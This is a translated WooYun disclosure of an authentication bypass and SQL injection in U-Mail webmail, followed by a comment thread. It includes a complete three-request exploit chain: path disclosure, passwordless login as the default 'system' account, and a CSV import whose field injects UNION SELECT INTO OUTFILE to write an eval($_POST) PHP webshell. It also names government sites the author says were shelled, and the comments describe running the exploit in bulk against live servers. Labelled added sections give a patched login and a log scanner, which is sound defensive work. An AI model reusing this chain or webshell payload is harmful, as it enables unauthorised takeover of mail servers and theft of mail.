
Vulnerability summary

Defect ID: WooYun-2015-93049

Title: U-Mail mail system mass getshell (truly unrestricted, no ordinary account needed)

Vendor: U-Mail

Author: Ano_Tom (certified white hat)

Submitted: 2015-01-23 09:24

Published: 2015-04-21 09:26

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact help@wooyun.org

Tags: none



Vulnerability details

Disclosure status:

2015-01-23: Details sent to the vendor; awaiting vendor handling
2015-01-26: Vendor confirmed; details disclosed to the vendor only
2015-01-29: Details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2015-03-22: Details opened to core white hats and relevant domain experts
2015-04-01: Details opened to regular white hats
2015-04-11: Details opened to intern white hats
2015-04-21: Details made public

Brief description:

The mail system allows login as an arbitrary user and also contains an SQL injection, so a shell can be obtained with no restrictions at all (the whole getshell process takes just three simple requests). 疯狗, if this one doesn't get struck by lightning, brace yourself.

Detailed description:

1. About the mail system

1) Official download: http://**.**.**.**/html/downloads/

2) Version: latest, V9.8.57

3) Test environment: Windows Server 2003 + IIS 6.0 + the vendor's default software

4) Deployments: a great many, including many government sites. http://**.**.**.**/html/case/ or Google "Powered by U-Mail"

Vulnerable file

/fast/default/operates.php

Code block:
require_once( LIB_PATH."Mailbox.php" );
require_once( LIB_PATH."Domain.php" );
$Mailbox = Mailbox::getinstance( );
$Domain = Domain::getinstance( );
if ( ACTION == "login" )
{
    $url_success = "index.php";
    $url_failure = "/webmail/";
    $wc_info = array( );
    $wc_info['mailbox'] = strtolower( trim( $_POST['mailbox'] ) ); // the mailbox name that must be submitted; no password field is read
    $wc_info['link'] = trim( $_POST['link'] );
    $wc_info['charset'] = trim( $_POST['charset'] );
    $wc_info['theme'] = trim( $_POST['theme'] );
    $wc_info['language'] = strtolower( trim( $_POST['language'] ) );
    if ( !$wc_info['link'] )
    {
        redirect( $url_failure, "参数错误!" );
    }
    $url_check = $wc_info['link']."&view=status";
    get_url_data( $url_check ); // return value is discarded
    list( $username, $domain_name ) = explode( "@", $wc_info['mailbox'] );
    $arr_tmp = $Domain->getDomainByName( $domain_name, "DomainID,DomainName", 0 ); // look up the domain
    $domain_id = $arr_tmp['DomainID'];
    $userinfo = $Mailbox->getMailboxByName( $domain_id, $username, "UserID,Password,FullName,MailDir,MaxNetFileSpace", 0 );
    $arr_tmp = $Domain->getPurchaseByDomainID( $domain_id, "id,corpname", 0 );
    $company = $arr_tmp['corpname'];
    set_session( "is_login", TRUE ); // the session is marked logged in without any password check
    set_session( "worldclient", $wc_info );
    set_session( "domain_id", $domain_id );
    set_session( "domain_name", $domain_name );
    set_session( "user_id", $userinfo['UserID'] );
    set_session( "email", $wc_info['mailbox'] );
    set_session( "fullname", $userinfo['FullName'] );
    set_session( "password", $userinfo['Password'] );
    set_session( "maildir", $userinfo['MailDir'] );
    set_session( "company_name", $company );
    set_session( "language", $wc_info['language'] );
    set_session( "username", $username );
    redirect( $url_success );
}



The get_url_data() function lives in /admin/include/base.func.php.

Its code is:

Code block:
function get_url_data( $_obfuscate_Il8i, $_obfuscate_5E5Av0svlQÿÿ = 1 )
{
    $_obfuscate_u_cÿ = curl_init( );
    curl_setopt( $_obfuscate_u_cÿ, CURLOPT_URL, $_obfuscate_Il8i ); // fetches the caller-supplied link
    curl_setopt( $_obfuscate_u_cÿ, CURLOPT_SSL_VERIFYPEER, FALSE );
    curl_setopt( $_obfuscate_u_cÿ, CURLOPT_SSL_VERIFYHOST, FALSE );
    curl_setopt( $_obfuscate_u_cÿ, CURLOPT_RETURNTRANSFER, TRUE );
    curl_setopt( $_obfuscate_u_cÿ, CURLOPT_CONNECTTIMEOUT, $_obfuscate_5E5Av0svlQÿÿ );
    $_obfuscate_6RYLWQÿÿ = curl_exec( $_obfuscate_u_cÿ );
    curl_close( $_obfuscate_u_cÿ );
    return $_obfuscate_6RYLWQÿÿ;
}



It serves no purpose for the login. Next,

$arr_tmp = $Domain->getDomainByName( $domain_name, "DomainID,DomainName", 0 ); is defined in the file

/admin/lib/Domains.php

Its code is:

Code block:
public function getDomainByName( $_obfuscate_yTDviRDH, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )
{
    $_obfuscate_IRFhnYwÿ = "DomainName='".$_obfuscate_yTDviRDH."'"; // WHERE clause built by string concatenation
    $_obfuscate_6RYLWQÿÿ = $this->getone_domain( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );
    return $_obfuscate_6RYLWQÿÿ;
}



This fetches the domain's ID. Next,

$userinfo = $Mailbox->getMailboxByName( $domain_id, $username, "UserID,Password,FullName,MailDir,MaxNetFileSpace", 0 );

is defined in the file

/admin/lib/Mailbox.php

Code block:
public function getMailboxByName( $_obfuscate_AkPSczrCIu40, $_obfuscate_3gn_eQÿÿ, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )
{
    $_obfuscate_AkPSczrCIu40 = intval( $_obfuscate_AkPSczrCIu40 );
    $_obfuscate_IRFhnYwÿ = "DomainID='".$_obfuscate_AkPSczrCIu40."' AND Mailbox='".$_obfuscate_3gn_eQÿÿ."'"; // the mailbox name is concatenated unescaped
    $_obfuscate_6RYLWQÿÿ = $this->getone_mailbox( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );
    return $_obfuscate_6RYLWQÿÿ;
}



The username is used directly in the SQL query and the user's record is fetched, but the password is never checked before set_session( "is_login", TRUE ) is called. The login therefore succeeds and any other method can then be executed, so it only takes finding one flawed method.

[Figure: a.png]



After logging in, as the figure shows, the page is in a blank (nothing displayed) state, but all the functions can now be executed, because a session ID exists.

[Figure: b.png]



Next, the vulnerable file is

/fast/pab/module/o_contact.php, with the code

Code block:
if ( ACTION == "contact-import" )
{
    $url = make_link( "pab", "view", "index" );
    $import_file = $_FILES['import_file']; // the uploaded file
    $import_group = $_POST['import_group'];
    $import_mode = $_POST['import_mode'];
    $file_path = $_FILES['import_file']['tmp_name'];
    $fp = @fopen( $file_path, "r" );
    if ( !$fp )
    {
        redirect( $url, "无法打开文件!" );
    }
    $i = 0;
    $file_fields = array( );
    while ( !feof( $fp ) )
    {
        $line = iconv( "GBK", "UTF-8", trim( fgets( $fp, 4096 ) ) ); // the CSV is read as GBK
        if ( $i == 0 )
        {
            $field_map = $PAB->getExportFieldMap( );
            $tmp_field_arr = explode( ",", trim( $line ) );
            foreach ( $tmp_field_arr as $tmp_field )
            {
                $tmp_field = trim( $tmp_field );
                $is_find = FALSE;
                foreach ( $field_map as $key => $field )
                {
                    if ( !( $tmp_field == $field ) || !( $tmp_field == "\"".$field."\"" ) )
                    {
                        continue;
                    }
                    $file_fields[] = $key;
                    $is_find = TRUE;
                    break;
                }
                if ( !$is_find )
                {
                    $file_fields[] = "";
                }
            }
        }
        else
        {
            $data = array( );
            $line_arr = explode( ",", $line );
            foreach ( $line_arr as $j => $val )
            {
                preg_match( "/\"(.+?)\"/", $val, $arr_tmp );
                $val = $arr_tmp[1] ? $arr_tmp[1] : $val;
                if ( !$val && !$file_fields[$j] && !( $val != "\"\"" ) )
                {
                    $data[$file_fields[$j]] = $val; // values read from the file are stored in the array
                }
            }
            if ( !$data )
            {
            }
            else
            {
                $data['updated'] = date( "Y-m-d H:i:s" );
                $contact = $PAB->getContactByMail( $user_id, $data['pref_email'], "contact_id", 0 ); // injection occurs here: pref_email comes straight from the CSV
                if ( $contact )
                {
                    do // decompiled control flow; the do/else/while(0) nesting is reproduced as it appears in the report
                    {
                        if ( !( $import_mode == "ignore" ) )
                        {
                            $where = "contact_id='".$contact['contact_id']."'";
                            $result = $PAB->update_contact( $data, $where, 0 );
                            if ( !$result )
                            {
                                redirect( $url, "更新数据失败!" );
                            }
                            if ( $import_group && $PAB->checkMap( $user_id, $import_group, $contact['contact_id'], 0 ) )
                            {
                                $contact_id = $contact['contact_id'];
                                break;
                                break;
                            }
                        }
                    }
                }
                else
                {
                    $data['user_id'] = $user_id;
                    $contact_id = $PAB->add_contact( $data, 0 );
                    if ( $contact_id )
                    {
                        break;
                    }
                    redirect( $url, "导入数据失败!" );
                } while ( 0 );
            }
            if ( $import_group )
            {
                $res = $PAB->addMap( $user_id, $import_group, $contact_id, 0 );
            }
        }
    }
    ++$i;
}
fclose( $fp );
redirect( $url, "导入数据成功!" );
}



The getContactByMail function is in /admin/lib/PAB.php:

Code block:
public function getContactByMail( $_obfuscate_nQNptTJPgÿÿ, $_obfuscate_ae6UFRQÿ, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )
{ //fuck getshell
    $_obfuscate_IRFhnYwÿ = "user_id='".$_obfuscate_nQNptTJPgÿÿ."' AND pref_email='".$_obfuscate_ae6UFRQÿ."'"; // pref_email concatenated into the WHERE clause unescaped
    $_obfuscate_6RYLWQÿÿ = $this->getone_contact( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );
    return $_obfuscate_6RYLWQÿÿ;
}
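As an added example (not U-Mail's code and not from the report's author), here are the two query paths analysed above, the login lookup and getContactByMail, written the way a fix would look: the login handler only creates a session after the submitted password verifies, and both lookups use PDO prepared statements so that a value from the request or from the uploaded CSV can only ever be data. The table names (domain, mailbox, pab_contact) and columns are assumed from the queries visible in this report, storage of passwords as password_hash() digests is an assumption (U-Mail may store them differently), and the DSN and credentials are placeholders.

```php
<?php
// Added example: hardened versions of the login lookup and getContactByMail.
// Not U-Mail's code. Assumptions (labelled): table names `domain`, `mailbox`
// and `pab_contact` with the columns seen in the report's queries; passwords
// stored as password_hash() digests; DSN and credentials are placeholders.

function db(): PDO
{
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=umail;charset=utf8mb4',
                   'umail_app', 'PLACEHOLDER-PASSWORD');          // placeholders
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);        // server-side prepares
    return $pdo;
}

// Login: the original handler sets is_login=TRUE after merely looking the
// mailbox up. This version returns the user record only when the submitted
// password verifies, and never when the mailbox or domain is unknown.
function authenticate(PDO $pdo, string $mailbox, string $password): ?array
{
    $mailbox = strtolower(trim($mailbox));
    if (!preg_match('/^[a-z0-9._-]+@[a-z0-9.-]+$/', $mailbox)) {
        return null;                                   // not user@domain: reject early
    }
    [$username, $domainName] = explode('@', $mailbox, 2);

    $st = $pdo->prepare('SELECT DomainID FROM domain WHERE DomainName = ? LIMIT 1');
    $st->execute([$domainName]);
    $domain = $st->fetch(PDO::FETCH_ASSOC);

    $user = false;
    if ($domain) {
        $st = $pdo->prepare('SELECT UserID, Password, FullName, MailDir '
                          . 'FROM mailbox WHERE DomainID = ? AND Mailbox = ? LIMIT 1');
        $st->execute([(int) $domain['DomainID'], $username]);
        $user = $st->fetch(PDO::FETCH_ASSOC);
    }

    // Verify against a throwaway hash when the account is unknown so that
    // response time does not reveal which mailboxes exist.
    $hash = $user ? (string) $user['Password'] : password_hash('unknown-account', PASSWORD_DEFAULT);
    if (!password_verify($password, $hash) || !$user) {
        return null;
    }
    return [
        'user_id'     => (int) $user['UserID'],
        'domain_id'   => (int) $domain['DomainID'],
        'username'    => $username,
        'domain_name' => $domainName,
        'fullname'    => $user['FullName'],
        'maildir'     => $user['MailDir'],
    ];
}

function startLoginSession(array $u): void
{
    session_regenerate_id(true);        // fresh session ID once authenticated
    $_SESSION['is_login']    = true;
    $_SESSION['user_id']     = $u['user_id'];
    $_SESSION['domain_id']   = $u['domain_id'];
    $_SESSION['domain_name'] = $u['domain_name'];
    $_SESSION['username']    = $u['username'];
    $_SESSION['fullname']    = $u['fullname'];
    $_SESSION['maildir']     = $u['maildir'];
    // The original also copied the stored password into the session; nothing needs it there.
}

// Contact lookup: pref_email came from an uploaded CSV and was concatenated
// into the WHERE clause. With a bound parameter it can only ever be data.
function getContactByMail(PDO $pdo, int $userId, string $prefEmail): ?array
{
    $st = $pdo->prepare('SELECT contact_id FROM pab_contact '
                      . 'WHERE user_id = ? AND pref_email = ? LIMIT 1');
    $st->execute([$userId, $prefEmail]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Minimal handler wiring, for illustration only.
if (PHP_SAPI !== 'cli' && ($_GET['action'] ?? '') === 'login') {
    session_start();
    $user = authenticate(db(), $_POST['mailbox'] ?? '', $_POST['password'] ?? '');
    if ($user === null) {
        http_response_code(401);
        exit('login failed');
    }
    startLoginSession($user);
    header('Location: index.php');
    exit;
}
```

Two design points worth noting. First, the dummy password_verify() on an unknown account keeps the failure path roughly as slow as the success path, so the login endpoint cannot be used to enumerate mailbox names such as the default system account mentioned later in the report. Second, the report's fix list also names the FILE privilege: on the database side, `REVOKE FILE ON *.* FROM 'umail'@'localhost'` (the account seen in the logged connection) together with a restrictive `secure_file_priv` setting removes the INTO OUTFILE write path even if another injection is found later.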



See the previous vulnerability report for the getshell analysis. The getshell process is: find one username, then execute the following

[Figure: c.png]



The request is

[Figure: d.png]



Then put the PHPSESSID into the Cookie header and send the following request to get a shell. The web path used in the exploit is obtained by visiting /webmail/client/mail/module/test.php, which needs no login, as shown in the figure. In addition, the mail system's default database account, umail, has the FILE privilege by default, which is what makes the getshell possible. (The CSV body is GBK-encoded, because the import code converts it from GBK to UTF-8, so the header row appears as mojibake in the captured request.)

[Figure: e.png]



Code block:
POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 814
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary77HSkP3chJHBAPXs
Referer: http://**.**.**.**/webmail/client/pab/index.php?module=view&action=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=2283f21dcf01afc8c707124764fe6bb6
------WebKitFormBoundary77HSkP3chJHBAPXs
Content-Disposition: form-data; name="import_file"; filename="getshell.csv"
Content-Type: application/vnd.ms-excel
Ãû,µç×ÓÓʼþµØÖ·,Ö÷Òªµç»°,ÉúÈÕ,סլµç»°,ÉÌÎñµç»°,Óû§ 1,Óû§ 2,סլµØÖ· ¹ú¼Ò/µØÇø,סլµØÖ· Ê¡/ÊÐ/×ÔÖÎÇø,סլµØÖ· ÊÐ/ÏØ,סլµØÖ· ½ÖµÀ,סլµØÖ· ÓÊÕþ±àÂë,ÍøÒ³,µ¥Î»,²¿ÃÅ,Ö°Îñ,ÉÌÎñµØÖ· ½ÖµÀ,ÉÌÎñµØÖ· ÓÊÕþ±àÂë,ÉÌÎñ´«Õæ,µç×ÓÓʼþ 2 µØÖ·,µç×ÓÓʼþ 3 µØÖ·,¸½×¢
hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#,,0000-00-00,,,,,,,,,,,,,,,,,,,
------WebKitFormBoundary77HSkP3chJHBAPXs
Content-Disposition: form-data; name="import_group"
15
------WebKitFormBoundary77HSkP3chJHBAPXs
Content-Disposition: form-data; name="import_mode"
ignore
------WebKitFormBoundary77HSkP3chJHBAPXs--



The SQL statements actually executed (from the MySQL log) are:

Code block:
150121  0:53:08	 1986 Connect	umail@localhost on 
1986 Query SET NAMES 'UTF8'
1986 Init DB umail
1986 Query SELECT contact_id FROM pab_contact WHERE user_id='7' AND pref_email='hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#' LIMIT 1
1986 Query INSERT INTO pab_contact SET `fullname`='hello1',`pref_email`='hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#',`birthday`='0000-00-00',`updated`='2015-01-21 00:53:08',`user_id`='7'
1986 Quit
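As an added example (not part of the report), a small scanner over MySQL general-log lines in the shape shown above. It flags Query entries that write files with INTO OUTFILE/DUMPFILE, read them with LOAD_FILE(), break out of a quoted literal into UNION SELECT, or carry a PHP open tag, which is exactly the pattern in the logged SELECT and INSERT. The sample log is constructed from the report's lines with the PHP literal replaced by a placeholder; a benign lookup is included to show it is not flagged.

```php
<?php
// Added example: flag injection-shaped queries in MySQL general-log lines.
// Not part of the report. The sample log below is constructed from the
// shapes in the report; the PHP literal is replaced by a placeholder.

const SAMPLE_GENERAL_LOG = <<<'LOG'
150121  0:53:08	 1986 Connect	umail@localhost on
1986 Query SET NAMES 'UTF8'
1986 Init DB umail
1986 Query SELECT contact_id FROM pab_contact WHERE user_id='7' AND pref_email='hello' AND 1=2 UNION SELECT '<?php PLACEHOLDER' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#' LIMIT 1
1986 Query INSERT INTO pab_contact SET `fullname`='hello1',`pref_email`='hello' AND 1=2 UNION SELECT '<?php PLACEHOLDER' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#',`birthday`='0000-00-00',`user_id`='7'
1986 Query SELECT contact_id FROM pab_contact WHERE user_id='7' AND pref_email='alice@example.invalid' LIMIT 1
1986 Quit
LOG;

/** Indicators checked against the SQL text of each "Query" entry. */
const INDICATORS = [
    'file write via INTO OUTFILE/DUMPFILE'          => '/\bINTO\s+(?:OUTFILE|DUMPFILE)\b/i',
    'file read via LOAD_FILE()'                     => '/\bLOAD_FILE\s*\(/i',
    'quoted literal broken out into UNION SELECT'   => '/\'[^\']*\'\s+(?:AND|OR)\s+\d+\s*=\s*\d+\s+UNION\s+SELECT\b/i',
    'trailing comment swallowing the closing quote' => '/#\'(?:\s|,|$)/',
    'PHP open tag inside a query literal'           => '/<\?php\b/i',
];

/**
 * Parse one general-log line into [thread_id, command, argument], or null.
 * Lines may start with a "YYMMDD  H:MM:SS" timestamp. Continuation lines of
 * multi-line queries are not handled in this example.
 */
function parseLogLine(string $line): ?array
{
    $re = '/^\s*(?:\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+)?(\d+)\s+(Connect|Init DB|Query|Quit)\s*(.*)$/';
    if (!preg_match($re, rtrim($line, "\r\n"), $m)) {
        return null;
    }
    return [(int) $m[1], $m[2], $m[3]];
}

/** Scan a whole log; returns one finding per suspicious query. */
function scanGeneralLog(string $log): array
{
    $findings = [];
    foreach (explode("\n", $log) as $idx => $line) {
        $entry = parseLogLine($line);
        if ($entry === null || $entry[1] !== 'Query') {
            continue;
        }
        $reasons = [];
        foreach (INDICATORS as $label => $regex) {
            if (preg_match($regex, $entry[2])) {
                $reasons[] = $label;
            }
        }
        if ($reasons) {
            $findings[] = ['line' => $idx + 1, 'thread' => $entry[0], 'reasons' => $reasons];
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    foreach (scanGeneralLog(SAMPLE_GENERAL_LOG) as $f) {
        printf("line %d thread %d: %s\n", $f['line'], $f['thread'], implode('; ', $f['reasons']));
    }
}
```

Run from the command line, the scanner reports lines 4 and 5 (the injected SELECT and the INSERT that re-uses the same value) with four indicators each and stays silent on line 6. In production the general log is expensive; the same indicators apply to a query log fed from a proxy, an audit plugin, or the application's own database layer, and the INTO OUTFILE and PHP-tag checks alone are specific enough to alert on.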



[Figure: f.png]



So, in summary, knowing a single mailbox username is enough to get a shell. How to do this in bulk? Just find an account that exists by default; the database is shown in the figure.

[Figure: g.png]



A system account exists by default, created at installation, so mass exploitation is possible directly.

[Figure: h.png]



Proof of vulnerability:

I won't bother writing the mass exploit.

Three requests: one to obtain the web path, one to log in and obtain the PHP session ID (system@**.**.**.** is enough), and one getshell request. Nothing more to say; I submitted one picked at random.

Step 1: the request that obtains the physical path

Code block:
GET /webmail/client/mail/module/test.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive



Step 2: the login request; the PHPSESSID is obtained from the response

Code block:
POST /webmail/fast/index.php?module=operate&action=login HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
mailbox=system@**.**.**.**&link=?



Step 3: put the PHPSESSID and the path into the following request and send the getshell exploit

Code block:
POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 553
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary69fA5vmkAMLB8gmA
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=53ad27d7a64bd68d372be8a94985606d
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_file"; filename="getshell.csv"
Content-Type: application/vnd.ms-excel
Ãû,µç×ÓÓʼþµØÖ·
hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'c:\\umail\\WorldClient\\html\\shell.php'#
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_group"
10
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_mode"
ignore
------WebKitFormBoundary69fA5vmkAMLB8gmA--



I tested two at random

Guangdong Maritime Safety Administration of the PRC http://**.**.**.**:3000/webmail/login9.php, shelled with ease

Guangzhou Civil Air Defense Office http://**.**.**.**/webmail/login9.php

[Figure: v.png]



Masked region:
(a numbered list of 202 affected webmail URLs, each masked by WooYun to the form http://**.**.**/webmail/anonymous.php)

Fix recommendations:

Login verification, the injection, the path disclosure, and the trade-off between the FILE privilege and the needs of the mail service

http://**.**.**.**/s/1gdvipFX password: zee5

Copyright notice: when reposting, credit the source as Ano_Tom@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-01-26 08:09

Vendor reply:

CNVD has confirmed and reproduced the described situation and will follow up with the software vendor together with the recent vulnerability in the same software. Based on the test cases, it will also be distributed to several CNCERT branch centers for coordinated handling. rank 40

Latest status:

None yet


Comments

  1. 2015-01-21 10:13 | Smilent ( intern white hat | Rank:38 vulns:7 | None)
    1

    The green hat Ano_Tom you follow has posted the vulnerability "U-Mail mail system mass getshell"

  2. 2015-01-21 11:33 | Ano_Tom certified white hat ( regular white hat | Rank:474 vulns:47 | Talk is cheap.:)
    1

    @Smilent running it in bulk right now, hahaha

  3. 2015-01-21 11:54 | Smilent ( intern white hat | Rank:38 vulns:7 | None)
    1

    @Ano_Tom hurry up and fire one off

  4. 2015-01-21 17:40 | ACGT ( intern white hat | Rank:32 vulns:4 | another script kiddie)
    0

    No lightning in sight; OP had better go buy some Vaseline

  5. 2015-01-21 19:28 | Ano_Tom certified white hat ( regular white hat | Rank:474 vulns:47 | Talk is cheap.:)
    0

    @Smilent the mass exploit is written; pay WooYun coins to view it, hahahaha

  6. 2015-01-21 19:28 | Ano_Tom certified white hat ( regular white hat | Rank:474 vulns:47 | Talk is cheap.:)
    0

    @ACGT I'll update it; if that doesn't work you'll have to buy it, haha

  7. 2015-01-23 13:28 | Ano_Tom certified white hat ( regular white hat | Rank:474 vulns:47 | Talk is cheap.:)
    0

    The getshell exploit is in the test code; and with that, it got struck by lightning... :)

  8. 2015-01-23 21:23 | 秋风 ( regular white hat | Rank:438 vulns:44 | a code monkey who follows internet security)
    0

    Awesome!

  9. 2015-01-26 09:02 | ki11y0u ( regular white hat | Rank:140 vulns:28 | studying hard, looking for a mentor ~~~~~~~~~~~~~~~~~~~~~~...)
    0

    @Ano_Tom 40 rank, damn~

  10. 2015-01-29 09:45 | 无力落地の白 ( intern white hat | Rank:48 vulns:19 | newbie)
    0

    6666666

  11. 2015-03-08 20:47 | 1c3z ( regular white hat | Rank:297 vulns:63 | @)!^)
    0

    Ugh, writing a PoC for this hole in Python was a real pain; it worked once I switched to GBK encoding...

  12. 2015-03-08 22:52 | U神 ( core white hat | Rank:1360 vulns:150 | WooYun core noob; this account is managed by the alliance, welcome to join 08...)
    0

    Impressive!

  13. 2015-03-11 21:15 | Ano_Tom certified white hat ( regular white hat | Rank:474 vulns:47 | Talk is cheap.:)
    0

    @疯狗 these are all shells, not just an echo of 987654321; below the echo statement there is also a one-line eval. Better mask them after all.

  14. 2015-03-11 22:35 | U神 ( core white hat | Rank:1360 vulns:150 | WooYun core noob; this account is managed by the alliance, welcome to join 08...)
    0

    @Ano_Tom you broke into that many mail systems in one go

  15. 2015-03-11 22:55 | Ano_Tom certified white hat ( regular white hat | Rank:474 vulns:47 | Talk is cheap.:)
    0

    @U神 I stopped it before the URL list had even finished, about half way through, haha...

  16. 2015-03-13 19:25 | 疯狗 certified white hat ( intern white hat | Rank:44 vulns:2 | Having read every vulnerability under heaven, the mind is naturally unmasked.)
    0

    @Ano_Tom done

  17. 2015-04-21 16:38 | 开心一下1313 ( intern white hat | Rank:75 vulns:24 | Take a sip of water and calm down......)
    0

    Respect!

  18. 2015-04-21 16:51 | sql小神 ( intern white hat | Rank:56 vulns:13 | Some vulnerabilities can be submitted, some cannot.)
    0

  19. 2015-04-22 09:29 | 萨瓦迪卡 ( regular white hat | Rank:128 vulns:21 | Black Prince)
    0

    Big thumbs up

  20. 2015-04-22 18:10 | Seven.Sea ( regular white hat | Rank:118 vulns:28 | Only security and good food must never be let down.)
    0

    Impressive, impressive =w=

  21. 2015-04-23 01:04 | Arthur ( intern white hat | Rank:85 vulns:35 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~)
    0

    This analysis is awesome! Great audit!
